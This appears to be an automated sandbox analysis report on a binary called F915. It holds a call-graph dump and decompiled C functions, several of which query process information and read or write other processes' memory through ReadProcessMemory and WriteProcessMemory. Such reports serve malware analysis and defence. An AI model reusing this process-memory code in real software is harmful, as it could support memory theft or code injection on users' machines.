f61149 10 API calls 4075->4076 4078 f61e2c 4076->4078 4077 f61d0a 4077->4069 4077->4070 4078->4077 4079 f61e46 GetModuleHandleW GetProcAddress 4078->4079 4080 f61e70 4079->4080 4080->4077 4081 f61149 10 API calls 4080->4081 4082 f61e86 GetModuleHandleW GetProcAddress 4081->4082 4083 f61eb7 4082->4083 4084 f61eed LocalFree 4083->4084 4085 f61149 10 API calls 4083->4085 4084->4077 4086 f61ed4 4085->4086 4087 f61ede 4086->4087 4088 f61ee8 LocalFree 4086->4088 4087->4084 4088->4084 4090 f6196d 4089->4090 4090->4021 4092 f614a7 4091->4092 4093 f614ad CreateFileMappingW 4092->4093 4097 f614f5 4092->4097 4094 f614c7 MapViewOfFile 4093->4094 4096 f614dd 4093->4096 4094->4096 4096->4097 4098 f61503 4096->4098 4097->4031 4099 f6150d UnmapViewOfFile 4098->4099 4100 f61514 4098->4100 4099->4100 4101 f6151a CloseHandle 4100->4101 4102 f61521 4100->4102 4101->4102 4102->4097 4104 f631e2 4103->4104 4112 f6320e 4103->4112 4141 f63168 4104->4141 4107 f6327d 4107->3988 4108 f631f0 StrCmpIW 4110 f63202 4108->4110 4111 f63205 LocalFree 4108->4111 4109 f63168 2 API calls 4113 f6323c _wcschr 4109->4113 4110->4111 4111->4107 4111->4112 4112->4107 4112->4109 4113->4107 4114 f6327a LocalFree 4113->4114 4114->4107 4116 f63642 4115->4116 4117 f634d4 13 API calls 4116->4117 4119 f6368f 4116->4119 4117->4119 4121 f6370f 4119->4121 4145 f63594 GetModuleHandleW GetProcAddress 4119->4145 4121->3988 4122 f636bc GetModuleHandleW GetProcAddress 4123 f636d8 4122->4123 4123->4121 4124 f61149 10 API calls 4123->4124 4125 f636ee 4124->4125 4126 f63705 LocalFree 4125->4126 4153 f63303 4125->4153 4126->4121 4129 f6368f 4128->4129 4130 f63673 4128->4130 4132 f63594 13 API calls 4129->4132 4134 f6370f 4129->4134 4131 f634d4 13 API calls 4130->4131 4131->4129 4133 f636b4 4132->4133 4133->4134 4135 f636bc GetModuleHandleW GetProcAddress 4133->4135 4134->3988 4136 f636d8 4135->4136 4136->4134 4137 f61149 10 API calls 4136->4137 4138 f636ee 4137->4138 4139 f63705 LocalFree 4138->4139 4140 f63303 26 API calls 
4138->4140 4139->4134 4140->4139 4142 f631a7 4141->4142 4143 f6316f GetModuleHandleW GetProcAddress 4141->4143 4142->4108 4142->4112 4144 f63191 4143->4144 4144->4142 4147 f635ce 4145->4147 4146 f6363a 4146->4121 4146->4122 4147->4146 4148 f61149 10 API calls 4147->4148 4152 f635e1 4148->4152 4149 f63629 LocalFree 4149->4146 4151 f61149 10 API calls 4151->4152 4152->4149 4152->4151 4154 f63324 4153->4154 4156 f634cf 4154->4156 4192 f61efa 4154->4192 4156->4126 4159 f61efa 12 API calls 4160 f6335d 4159->4160 4163 f61f6d 2 API calls 4160->4163 4164 f63366 4160->4164 4161 f63348 4161->4159 4162 f61efa 12 API calls 4168 f6337b 4162->4168 4163->4164 4164->4162 4165 f6349f 4166 f634a6 LocalFree 4165->4166 4167 f634af 4165->4167 4166->4167 4169 f634b6 LocalFree 4167->4169 4170 f634bf 4167->4170 4168->4165 4171 f61f6d 2 API calls 4168->4171 4169->4170 4170->4156 4172 f634c6 LocalFree 4170->4172 4173 f6339a 4171->4173 4172->4156 4173->4165 4174 f63168 2 API calls 4173->4174 4175 f633b5 4174->4175 4176 f63168 2 API calls 4175->4176 4177 f633bf 4176->4177 4178 f63168 2 API calls 4177->4178 4179 f633ca 4178->4179 4180 f633d5 StrChrW 4179->4180 4181 f633e9 wsprintfW 4179->4181 4180->4181 4183 f63435 4181->4183 4183->4183 4184 f63440 GetModuleHandleW GetProcAddress 4183->4184 4185 f63476 4184->4185 4186 f6347a LocalFree 4185->4186 4187 f63481 4185->4187 4186->4187 4188 f63486 LocalFree 4187->4188 4189 f6348f 4187->4189 4188->4189 4190 f63494 LocalFree 4189->4190 4191 f6349d 4189->4191 4190->4191 4191->4165 4193 f61f22 4192->4193 4197 f61f63 4192->4197 4194 f61f2b GetModuleHandleW GetProcAddress 4193->4194 4193->4197 4195 f61f47 4194->4195 4196 f61149 10 API calls 4195->4196 4195->4197 4196->4197 4197->4161 4198 f61f6d 4197->4198 4199 f61f7c IsCharAlphaNumericW 4198->4199 4200 f61f8d IsTextUnicode 4198->4200 4199->4200 4201 f61fa2 4199->4201 4200->4201 4201->4161 4203 f64e35 __CxxUnhandledExceptionFilter 4202->4203 4204 f66117 ___crtLCMapStringA 61 API calls 4203->4204 4205 
f64e3c 4204->4205 4206 f64e67 DecodePointer 4205->4206 4214 f64ee6 4205->4214 4208 f64e7e DecodePointer 4206->4208 4206->4214 4210 f64e91 4208->4210 4210->4214 4219 f64ea8 DecodePointer 4210->4219 4222 f64eb7 DecodePointer DecodePointer 4210->4222 4223 f64593 EncodePointer 4210->4223 4212 f64f63 __CxxUnhandledExceptionFilter 4212->3582 4225 f64f54 4214->4225 4215 f64f4b 4216 f64d11 __amsg_exit 3 API calls 4215->4216 4217 f64f54 4215->4217 4216->4217 4218 f64f61 4217->4218 4230 f6603e LeaveCriticalSection 4217->4230 4218->3582 4224 f64593 EncodePointer 4219->4224 4222->4210 4223->4210 4224->4210 4226 f64f5a 4225->4226 4227 f64f34 4225->4227 4231 f6603e LeaveCriticalSection 4226->4231 4227->4212 4229 f6603e LeaveCriticalSection 4227->4229 4229->4215 4230->4218 4231->4227 4233 f64e29 __amsg_exit 66 API calls 4232->4233 4234 f64f90 4233->4234 4267 f623e1 4268 f62440 4267->4268 4269 f6134e 13 API calls 4268->4269 4270 f6246e 4269->4270 4271 f61149 10 API calls 4270->4271 4278 f624fa 4270->4278 4272 f62496 4271->4272 4273 f61149 10 API calls 4272->4273 4272->4278 4274 f624b7 4273->4274 4274->4278 4279 f62510 4274->4279 4277 f62510 10 API calls 4277->4278 4280 f61149 10 API calls 4279->4280 4281 f6252f 4280->4281 4282 f624db 4281->4282 4283 f61149 10 API calls 4281->4283 4282->4277 4282->4278 4284 f62542 4283->4284 4284->4282 4285 f61149 10 API calls 4284->4285 4285->4282 4286 f66d14 4287 f66d17 4286->4287 4290 f67bf4 4287->4290 4299 f66d8f DecodePointer 4290->4299 4292 f67bf9 4293 f67c04 4292->4293 4300 f66d9c 4292->4300 4295 f67c1c 4293->4295 4296 f64ab6 __CxxUnhandledExceptionFilter 8 API calls 4293->4296 4297 f64f7f __amsg_exit 66 API calls 4295->4297 4296->4295 4298 f67c26 4297->4298 4299->4292 4306 f66da8 __CxxUnhandledExceptionFilter 4300->4306 4301 f66dcf 4302 f646ca __XcptFilter 66 API calls 4301->4302 4305 f66dd4 _siglookup 4302->4305 4304 f66e03 4307 f66de5 DecodePointer 4304->4307 4308 f66e12 4304->4308 4309 f66ddd __CxxUnhandledExceptionFilter 4305->4309 4314 
f66e6f 4305->4314 4315 f64f7f __amsg_exit 66 API calls 4305->4315 4306->4301 4306->4304 4306->4307 4310 f66dcb 4306->4310 4307->4305 4311 f64c83 __wcsicoll 66 API calls 4308->4311 4309->4293 4310->4301 4310->4308 4312 f66e17 4311->4312 4313 f64c31 __wcsicoll 11 API calls 4312->4313 4313->4309 4316 f66117 ___crtLCMapStringA 66 API calls 4314->4316 4317 f66e7a 4314->4317 4315->4314 4316->4317 4319 f66eaf 4317->4319 4321 f64593 EncodePointer 4317->4321 4322 f66f03 4319->4322 4321->4319 4323 f66f09 4322->4323 4325 f66f10 4322->4325 4326 f6603e LeaveCriticalSection 4323->4326 4325->4309 4326->4325 4851 f677cc IsProcessorFeaturePresent 4331 f64203 4334 f6603e LeaveCriticalSection 4331->4334 4333 f6420a 4334->4333 4335 f6475d 4336 f64769 __CxxUnhandledExceptionFilter 4335->4336 4337 f64781 4336->4337 4338 f6486b __CxxUnhandledExceptionFilter 4336->4338 4339 f6614a __freea 66 API calls 4336->4339 4340 f6478f 4337->4340 4341 f6614a __freea 66 API calls 4337->4341 4339->4337 4342 f6479d 4340->4342 4343 f6614a __freea 66 API calls 4340->4343 4341->4340 4344 f6614a __freea 66 API calls 4342->4344 4345 f647ab 4342->4345 4343->4342 4344->4345 4346 f6614a __freea 66 API calls 4345->4346 4347 f647b9 4345->4347 4346->4347 4348 f647c7 4347->4348 4349 f6614a __freea 66 API calls 4347->4349 4350 f647d5 4348->4350 4351 f6614a __freea 66 API calls 4348->4351 4349->4348 4353 f6614a __freea 66 API calls 4350->4353 4355 f647e6 4350->4355 4351->4350 4352 f66117 ___crtLCMapStringA 66 API calls 4354 f647ee 4352->4354 4353->4355 4356 f64813 4354->4356 4357 f647fa InterlockedDecrement 4354->4357 4355->4352 4371 f64877 4356->4371 4357->4356 4360 f64805 4357->4360 4360->4356 4362 f6614a __freea 66 API calls 4360->4362 4361 f66117 ___crtLCMapStringA 66 API calls 4363 f64827 4361->4363 4362->4356 4370 f64858 4363->4370 4374 f642e9 4363->4374 4368 f6614a __freea 66 API calls 4368->4338 4418 f64883 4370->4418 4421 f6603e LeaveCriticalSection 4371->4421 4373 f64820 4373->4361 4375 f642fa 
InterlockedDecrement 4374->4375 4376 f6437d 4374->4376 4377 f64312 4375->4377 4378 f6430f InterlockedDecrement 4375->4378 4376->4370 4388 f64382 4376->4388 4379 f6431c InterlockedDecrement 4377->4379 4380 f6431f 4377->4380 4378->4377 4379->4380 4381 f6432c 4380->4381 4382 f64329 InterlockedDecrement 4380->4382 4383 f64336 InterlockedDecrement 4381->4383 4384 f64339 4381->4384 4382->4381 4383->4384 4385 f64352 InterlockedDecrement 4384->4385 4386 f64362 InterlockedDecrement 4384->4386 4387 f6436d InterlockedDecrement 4384->4387 4385->4384 4386->4384 4387->4376 4389 f64399 4388->4389 4390 f64406 4388->4390 4389->4390 4400 f643cd 4389->4400 4402 f6614a __freea 66 API calls 4389->4402 4391 f6614a __freea 66 API calls 4390->4391 4392 f64453 4390->4392 4394 f64427 4391->4394 4405 f6447c 4392->4405 4462 f66263 4392->4462 4396 f6614a __freea 66 API calls 4394->4396 4401 f6443a 4396->4401 4397 f644c1 4404 f6614a __freea 66 API calls 4397->4404 4398 f6614a __freea 66 API calls 4403 f643fb 4398->4403 4399 f6614a __freea 66 API calls 4399->4405 4406 f6614a __freea 66 API calls 4400->4406 4417 f643ee 4400->4417 4407 f6614a __freea 66 API calls 4401->4407 4409 f643c2 4402->4409 4410 f6614a __freea 66 API calls 4403->4410 4412 f644c7 4404->4412 4405->4397 4408 f6614a 66 API calls __freea 4405->4408 4411 f643e3 4406->4411 4414 f64448 4407->4414 4408->4405 4422 f66643 4409->4422 4410->4390 4450 f665da 4411->4450 4412->4370 4416 f6614a __freea 66 API calls 4414->4416 4416->4392 4417->4398 4636 f6603e LeaveCriticalSection 4418->4636 4420 f64865 4420->4368 4421->4373 4423 f66654 4422->4423 4449 f6673d 4422->4449 4424 f66665 4423->4424 4425 f6614a __freea 66 API calls 4423->4425 4426 f66677 4424->4426 4427 f6614a __freea 66 API calls 4424->4427 4425->4424 4428 f66689 4426->4428 4430 f6614a __freea 66 API calls 4426->4430 4427->4426 4429 f6669b 4428->4429 4431 f6614a __freea 66 API calls 4428->4431 4432 f6614a __freea 66 API calls 4429->4432 4433 f666ad 4429->4433 4430->4428 4431->4429 
4432->4433 4434 f6614a __freea 66 API calls 4433->4434 4437 f666bf 4433->4437 4434->4437 4435 f666e3 4440 f666f5 4435->4440 4441 f6614a __freea 66 API calls 4435->4441 4436 f666d1 4436->4435 4439 f6614a __freea 66 API calls 4436->4439 4437->4436 4438 f6614a __freea 66 API calls 4437->4438 4438->4436 4439->4435 4442 f66707 4440->4442 4443 f6614a __freea 66 API calls 4440->4443 4441->4440 4445 f66719 4442->4445 4446 f6614a __freea 66 API calls 4442->4446 4443->4442 4444 f6672b 4448 f6614a __freea 66 API calls 4444->4448 4444->4449 4445->4444 4447 f6614a __freea 66 API calls 4445->4447 4446->4445 4447->4444 4448->4449 4449->4400 4451 f6663f 4450->4451 4452 f665e7 4450->4452 4451->4417 4453 f6614a __freea 66 API calls 4452->4453 4455 f665f7 4452->4455 4453->4455 4454 f66609 4456 f6661b 4454->4456 4458 f6614a __freea 66 API calls 4454->4458 4455->4454 4457 f6614a __freea 66 API calls 4455->4457 4459 f6662d 4456->4459 4460 f6614a __freea 66 API calls 4456->4460 4457->4454 4458->4456 4459->4451 4461 f6614a __freea 66 API calls 4459->4461 4460->4459 4461->4451 4463 f66274 4462->4463 4635 f64471 4462->4635 4464 f6614a __freea 66 API calls 4463->4464 4465 f6627c 4464->4465 4466 f6614a __freea 66 API calls 4465->4466 4467 f66284 4466->4467 4468 f6614a __freea 66 API calls 4467->4468 4469 f6628c 4468->4469 4470 f6614a __freea 66 API calls 4469->4470 4471 f66294 4470->4471 4472 f6614a __freea 66 API calls 4471->4472 4473 f6629c 4472->4473 4474 f6614a __freea 66 API calls 4473->4474 4475 f662a4 4474->4475 4476 f6614a __freea 66 API calls 4475->4476 4477 f662ab 4476->4477 4478 f6614a __freea 66 API calls 4477->4478 4479 f662b3 4478->4479 4480 f6614a __freea 66 API calls 4479->4480 4481 f662bb 4480->4481 4482 f6614a __freea 66 API calls 4481->4482 4483 f662c3 4482->4483 4484 f6614a __freea 66 API calls 4483->4484 4485 f662cb 4484->4485 4486 f6614a __freea 66 API calls 4485->4486 4487 f662d3 4486->4487 4488 f6614a __freea 66 API calls 4487->4488 4489 f662db 4488->4489 4490 f6614a 
__freea 66 API calls 4489->4490 4491 f662e3 4490->4491 4492 f6614a __freea 66 API calls 4491->4492 4493 f662eb 4492->4493 4494 f6614a __freea 66 API calls 4493->4494 4495 f662f3 4494->4495 4496 f6614a __freea 66 API calls 4495->4496 4497 f662fe 4496->4497 4498 f6614a __freea 66 API calls 4497->4498 4499 f66306 4498->4499 4500 f6614a __freea 66 API calls 4499->4500 4501 f6630e 4500->4501 4502 f6614a __freea 66 API calls 4501->4502 4503 f66316 4502->4503 4504 f6614a __freea 66 API calls 4503->4504 4505 f6631e 4504->4505 4506 f6614a __freea 66 API calls 4505->4506 4507 f66326 4506->4507 4508 f6614a __freea 66 API calls 4507->4508 4509 f6632e 4508->4509 4510 f6614a __freea 66 API calls 4509->4510 4511 f66336 4510->4511 4512 f6614a __freea 66 API calls 4511->4512 4513 f6633e 4512->4513 4514 f6614a __freea 66 API calls 4513->4514 4515 f66346 4514->4515 4516 f6614a __freea 66 API calls 4515->4516 4517 f6634e 4516->4517 4518 f6614a __freea 66 API calls 4517->4518 4519 f66356 4518->4519 4520 f6614a __freea 66 API calls 4519->4520 4521 f6635e 4520->4521 4522 f6614a __freea 66 API calls 4521->4522 4523 f66366 4522->4523 4524 f6614a __freea 66 API calls 4523->4524 4525 f6636e 4524->4525 4526 f6614a __freea 66 API calls 4525->4526 4527 f66376 4526->4527 4528 f6614a __freea 66 API calls 4527->4528 4529 f66384 4528->4529 4530 f6614a __freea 66 API calls 4529->4530 4531 f6638f 4530->4531 4532 f6614a __freea 66 API calls 4531->4532 4533 f6639a 4532->4533 4534 f6614a __freea 66 API calls 4533->4534 4535 f663a5 4534->4535 4536 f6614a __freea 66 API calls 4535->4536 4537 f663b0 4536->4537 4538 f6614a __freea 66 API calls 4537->4538 4539 f663bb 4538->4539 4540 f6614a __freea 66 API calls 4539->4540 4541 f663c6 4540->4541 4542 f6614a __freea 66 API calls 4541->4542 4543 f663d1 4542->4543 4544 f6614a __freea 66 API calls 4543->4544 4545 f663dc 4544->4545 4546 f6614a __freea 66 API calls 4545->4546 4547 f663e7 4546->4547 4548 f6614a __freea 66 API calls 4547->4548 4549 f663f2 4548->4549 

    Executed Functions

    C-Code - Quality: 79%
    			E00F618D9(void** __esi, union _SYSTEMINFOCLASS _a4) {
    				union _SYSTEMINFOCLASS _v4;
    				void* _t3;
    				_Unknown_base(*)()* _t5;
    				void* _t6;
    				long _t8;
    				long _t12;
    				long _t14;
    				void** _t15;
    
    				_t15 = __esi;
    				_t3 =  *__esi;
    				_t14 = 0xc0000004;
    				if(_t3 == 0) {
    					_t12 = 0x1000;
    					while(1) {
    						_t5 = GetProcAddress(GetModuleHandleW(L"kernel32"), "LocalAlloc"); // executed
    						_t6 =  *_t5(0x40, _t12); // executed
    						 *_t15 = _t6;
    						if(_t6 == 0) {
    							break;
    						}
    						_t8 = NtQuerySystemInformation(_v4, _t6, _t12, 0); // executed
    						_t14 = _t8;
    						if(_t14 < 0) {
    							LocalFree( *_t15);
    						}
    						_t12 = _t12 + _t12;
    						if(_t14 == 0xc0000004) {
    							continue;
    						}
    						break;
    					}
    				} else {
    					_t14 = NtQuerySystemInformation(_a4, _t3, 0, 0);
    				}
    				return _t14;
    			}


    APIs
    • NtQuerySystemInformation.NTDLL(00000000,00000000,00000000,00000000,00000000,00F619B7,00000005), ref: 00F618EE
    • GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00001000,?,00000000,00F619B7,00000005), ref: 00F6190B
    • GetProcAddress.KERNEL32(00000000,?,00000000,00F619B7,00000005), ref: 00F61912
    • NtQuerySystemInformation.NTDLL(?,00000000,00001000,00000000,?,00000000,00F619B7,00000005), ref: 00F61928
    • LocalFree.KERNEL32(?,?,00000000,00F619B7,00000005), ref: 00F61936
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1689369576.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000002.1689363080.00F60000.00000002.sdmp
    • Associated: 00000005.00000002.1689377239.00F68000.00000002.sdmp
    • Associated: 00000005.00000002.1689384429.00F6B000.00000004.sdmp
    • Associated: 00000005.00000002.1689391890.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_f60000_F915.jbxd
    C-Code - Quality: 50%
    			E00F61D5F(char __eax, intOrPtr* __ecx) {
    				signed int _v8;
    				long _v12;
    				intOrPtr* _v16;
    				signed int _v20;
    				intOrPtr _v24;
    				char _v28;
    				signed int _v48;
    				void _v52;
    				void* _t20;
    				long _t22;
    				signed int _t23;
    				signed int _t26;
    				char _t31;
    				intOrPtr* _t32;
    				intOrPtr _t34;
    				union _PROCESSINFOCLASS _t36;
    
    				_v8 = _v8 & 0x00000000;
    				_t32 = __ecx;
    				_t31 = __eax;
    				if( *__ecx != 1) {
    					_t20 = GetCurrentProcess();
    				} else {
    					_t20 =  *( *(__ecx + 4));
    				}
    				_v20 = _v20 & 0x00000000;
    				_v16 = _t32;
    				_t34 =  *_t32;
    				_v28 = _t31;
    				_v24 = 0xf6cd30;
    				if(_t34 == 0) {
    					__imp__RtlGetCurrentPeb();
    					asm("movsd");
    					asm("movsd");
    					asm("movsd");
    					asm("movsd");
    					_v8 = 1;
    				} else {
    					_t36 = _t34 - 1;
    					if(_t36 == 0) {
    						_t22 = NtQueryInformationProcess(_t20, _t36,  &_v52, 0x18,  &_v12); // executed
    						if(_t22 >= 0 && _v12 == 0x18) {
    							_t23 = _v48;
    							if(_t23 != 0) {
    								_v20 = _t23;
    								_t26 = E00F61149( &_v28,  &_v20, 0x10); // executed
    								_v8 = _t26;
    							}
    						}
    					}
    				}
    				return _v8;
    			}


    APIs
    • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,00F61CA8), ref: 00F61D7B
    • NtQueryInformationProcess.NTDLL(00000000,?,?,00000018,?), ref: 00F61DA8
      • Part of subcall function 00F61149: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00F611A7
      • Part of subcall function 00F61149: GetModuleHandleW.KERNEL32(kernel32,ReadFile,?,?,?,?,00000000), ref: 00F611D2
      • Part of subcall function 00F61149: GetProcAddress.KERNEL32(00000000), ref: 00F611D9
      • Part of subcall function 00F61149: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00F61230
      • Part of subcall function 00F61149: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00F61263
      • Part of subcall function 00F61149: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00F612C5
      • Part of subcall function 00F61149: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?), ref: 00F612F8
      • Part of subcall function 00F61149: GetProcAddress.KERNEL32(00000000), ref: 00F612FF
      • Part of subcall function 00F61149: LocalFree.KERNEL32(?), ref: 00F6133D
    • RtlGetCurrentPeb.NTDLL ref: 00F61DDE
    Memory Dump Source
    • Source File: 00000005.00000002.1689369576.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000002.1689363080.00F60000.00000002.sdmp
    • Associated: 00000005.00000002.1689377239.00F68000.00000002.sdmp
    • Associated: 00000005.00000002.1689384429.00F6B000.00000004.sdmp
    • Associated: 00000005.00000002.1689391890.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_f60000_F915.jbxd
    C-Code - Quality: 100%
    			E00F64CD8() {
    
    				SetUnhandledExceptionFilter(E00F64C96);
    				return 0;
    			}


    APIs
    • SetUnhandledExceptionFilter.KERNEL32(Function_00004C96), ref: 00F64CDD
    Memory Dump Source
    • Source File: 00000005.00000002.1689369576.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000002.1689363080.00F60000.00000002.sdmp
    • Associated: 00000005.00000002.1689377239.00F68000.00000002.sdmp
    • Associated: 00000005.00000002.1689384429.00F6B000.00000004.sdmp
    • Associated: 00000005.00000002.1689391890.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_f60000_F915.jbxd
    C-Code - Quality: 62%
    			E00F6488C(void* __ebx) {
    				void* __edi;
    				void* __esi;
    				_Unknown_base(*)()* _t7;
    				long _t10;
    				void* _t11;
    				int _t12;
    				void* _t14;
    				void* _t15;
    				void* _t16;
    				void* _t18;
    				intOrPtr _t21;
    				long _t26;
    				void* _t30;
    				struct HINSTANCE__* _t35;
    				intOrPtr* _t36;
    				void* _t39;
    				intOrPtr* _t41;
    				void* _t42;
    
    				_t30 = __ebx;
    				_t35 = GetModuleHandleW(L"KERNEL32.DLL");
    				if(_t35 != 0) {
    					 *0xf6bfe8 = GetProcAddress(_t35, "FlsAlloc");
    					 *0xf6bfec = GetProcAddress(_t35, "FlsGetValue");
    					 *0xf6bff0 = GetProcAddress(_t35, "FlsSetValue");
    					_t7 = GetProcAddress(_t35, "FlsFree");
    					__eflags =  *0xf6bfe8;
    					_t39 = TlsSetValue;
    					 *0xf6bff4 = _t7;
    					if( *0xf6bfe8 == 0) {
    						L6:
    						 *0xf6bfec = TlsGetValue;
    						 *0xf6bfe8 = E00F6459C;
    						 *0xf6bff0 = _t39;
    						 *0xf6bff4 = TlsFree;
    					} else {
    						__eflags =  *0xf6bfec;
    						if( *0xf6bfec == 0) {
    							goto L6;
    						} else {
    							__eflags =  *0xf6bff0;
    							if( *0xf6bff0 == 0) {
    								goto L6;
    							} else {
    								__eflags = _t7;
    								if(_t7 == 0) {
    									goto L6;
    								}
    							}
    						}
    					}
    					_t10 = TlsAlloc();
    					 *0xf6b778 = _t10;
    					__eflags = _t10 - 0xffffffff;
    					if(_t10 == 0xffffffff) {
    						L15:
    						_t11 = 0;
    						__eflags = 0;
    					} else {
    						_t12 = TlsSetValue(_t10,  *0xf6bfec);
    						__eflags = _t12;
    						if(_t12 == 0) {
    							goto L15;
    						} else {
    							E00F64D3B();
    							_t41 = __imp__EncodePointer;
    							_t14 =  *_t41( *0xf6bfe8);
    							 *0xf6bfe8 = _t14;
    							_t15 =  *_t41( *0xf6bfec);
    							 *0xf6bfec = _t15;
    							_t16 =  *_t41( *0xf6bff0);
    							 *0xf6bff0 = _t16;
    							 *0xf6bff4 =  *_t41( *0xf6bff4);
    							_t18 = E00F65F9D();
    							__eflags = _t18;
    							if(_t18 == 0) {
    								L14:
    								E00F645D9();
    								goto L15;
    							} else {
    								_t36 = __imp__DecodePointer;
    								_t21 =  *((intOrPtr*)( *_t36()))( *0xf6bfe8, E00F6475D);
    								 *0xf6b774 = _t21;
    								__eflags = _t21 - 0xffffffff;
    								if(_t21 == 0xffffffff) {
    									goto L14;
    								} else {
    									_t42 = E00F661C9(1, 0x214);
    									__eflags = _t42;
    									if(_t42 == 0) {
    										goto L14;
    									} else {
    										__eflags =  *((intOrPtr*)( *_t36()))( *0xf6bff0,  *0xf6b774, _t42);
    										if(__eflags == 0) {
    											goto L14;
    										} else {
    											_push(0);
    											_push(_t42);
    											E00F64616(_t30, _t36, _t42, __eflags);
    											_t26 = GetCurrentThreadId();
    											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
    											 *_t42 = _t26;
    											_t11 = 1;
    										}
    									}
    								}
    							}
    						}
    					}
    					return _t11;
    				} else {
    					E00F645D9();
    					return 0;
    				}
    			}


    APIs
    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00F63A8B,00F69DC8,00000014), ref: 00F64894
    • GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,00F63A8B,00F69DC8,00000014), ref: 00F648B6
    • GetProcAddress.KERNEL32(00000000,FlsGetValue,?,00F63A8B,00F69DC8,00000014), ref: 00F648C3
    • GetProcAddress.KERNEL32(00000000,FlsSetValue,?,00F63A8B,00F69DC8,00000014), ref: 00F648D0
    • GetProcAddress.KERNEL32(00000000,FlsFree,?,00F63A8B,00F69DC8,00000014), ref: 00F648DD
    • TlsAlloc.KERNEL32(?,00F63A8B,00F69DC8,00000014), ref: 00F6492D
    • TlsSetValue.KERNEL32(00000000,?,00F63A8B,00F69DC8,00000014), ref: 00F64948
    • EncodePointer.KERNEL32(?,00F63A8B,00F69DC8,00000014), ref: 00F64963
    • EncodePointer.KERNEL32(?,00F63A8B,00F69DC8,00000014), ref: 00F64970
    • EncodePointer.KERNEL32(?,00F63A8B,00F69DC8,00000014), ref: 00F6497D
    • EncodePointer.KERNEL32(?,00F63A8B,00F69DC8,00000014), ref: 00F6498A
      • Part of subcall function 00F65F9D: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000FA0), ref: 00F65FC5
    • DecodePointer.KERNEL32(00F6475D,?,00F63A8B,00F69DC8,00000014), ref: 00F649AB
      • Part of subcall function 00F661C9: Sleep.KERNEL32(00000000), ref: 00F661F1
    • DecodePointer.KERNEL32(00000000,?,00F63A8B,00F69DC8,00000014), ref: 00F649DA
      • Part of subcall function 00F64616: GetModuleHandleW.KERNEL32(KERNEL32.DLL,00F69E48,00000008,00F6471E,00000000,00000000,?,?,00F6474B,?,00F63785), ref: 00F64627
      • Part of subcall function 00F64616: InterlockedIncrement.KERNEL32(00F6B008), ref: 00F64668
    • GetCurrentThreadId.KERNEL32(?,00F63A8B,00F69DC8,00000014), ref: 00F649EC
      • Part of subcall function 00F645D9: DecodePointer.KERNEL32(FFFFFFFF,00F64A02,?,00F63A8B,00F69DC8,00000014), ref: 00F645EA
      • Part of subcall function 00F645D9: TlsFree.KERNEL32(FFFFFFFF,00F64A02,?,00F63A8B,00F69DC8,00000014), ref: 00F64604
      • Part of subcall function 00F645D9: DeleteCriticalSection.KERNEL32(00000000,00000000,0000A47E,?,00F64A02,?,00F63A8B,00F69DC8,00000014), ref: 00F66004
      • Part of subcall function 00F645D9: DeleteCriticalSection.KERNEL32(FFFFFFFF,0000A47E,?,00F64A02,?,00F63A8B,00F69DC8,00000014), ref: 00F6602E
    Strings
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    C-Code - Quality: 56%
    			E00F61149(void** _a4, void** _a8, long _a12) {
    				intOrPtr _v8;
    				LONG* _v12;
    				char _v16;
    				LONG* _v20;
    				intOrPtr _v28;
    				void* __esi;
    				long _t45;
    				int _t49;
    				LONG* _t63;
    				void* _t79;
    				void* _t81;
    				void* _t82;
    				void* _t83;
    				void* _t86;
    				void* _t89;
    				long _t92;
    				void** _t94;
    				long* _t97;
    				long* _t99;
    				void** _t100;
    
    				_t94 = _a4;
    				_t45 = _t94[1];
    				_v12 = 0;
    				_v8 = 0xf6cd30;
    				_t79 =  *_t45;
    				_v20 = 0;
    				if(_t79 == 0) {
    					_t97 = _a8;
    					_t45 = _t97[1];
    					_t81 =  *_t45;
    					if(_t81 == 0) {
    						E00F668B0( *_t94,  *_t97, _a12);
    						_v20 = 1;
    						L30:
    						return _v20;
    					}
    					_t82 = _t81 - 1;
    					if(_t82 == 0) {
    						_t49 = ReadProcessMemory( *( *(_t45 + 4)),  *_t97,  *_t94, _a12, 0); // executed
    						L9:
    						_v20 = _t49;
    						goto L30;
    					}
    					_t83 = _t82 - 1;
    					if(_t83 == 0) {
    						_t49 = E00F61560( *( *(_t45 + 4)),  *_t94,  *_t97, _a12);
    						goto L9;
    					}
    					_t84 = _t83 - 1;
    					if(_t84 == 0) {
    						_push(0);
    						_push( *_t97);
    						_t99 =  &_a12;
    						_push(0x22c183);
    						L12:
    						_push( *( *(_t45 + 4)));
    						_t49 = E00F61000(_t94, _t84, _t99);
    						goto L9;
    					}
    					if(_t84 != 3 || SetFilePointer( *( *(_t45 + 4)),  *_t97, 0, 0) == 0xffffffff) {
    						goto L30;
    					} else {
    						_push(0);
    						_push( &_v16);
    						_push(_a12);
    						_push( *_t94);
    						_push( *((intOrPtr*)( *((intOrPtr*)(_t97[1] + 4)))));
    						_push("ReadFile");
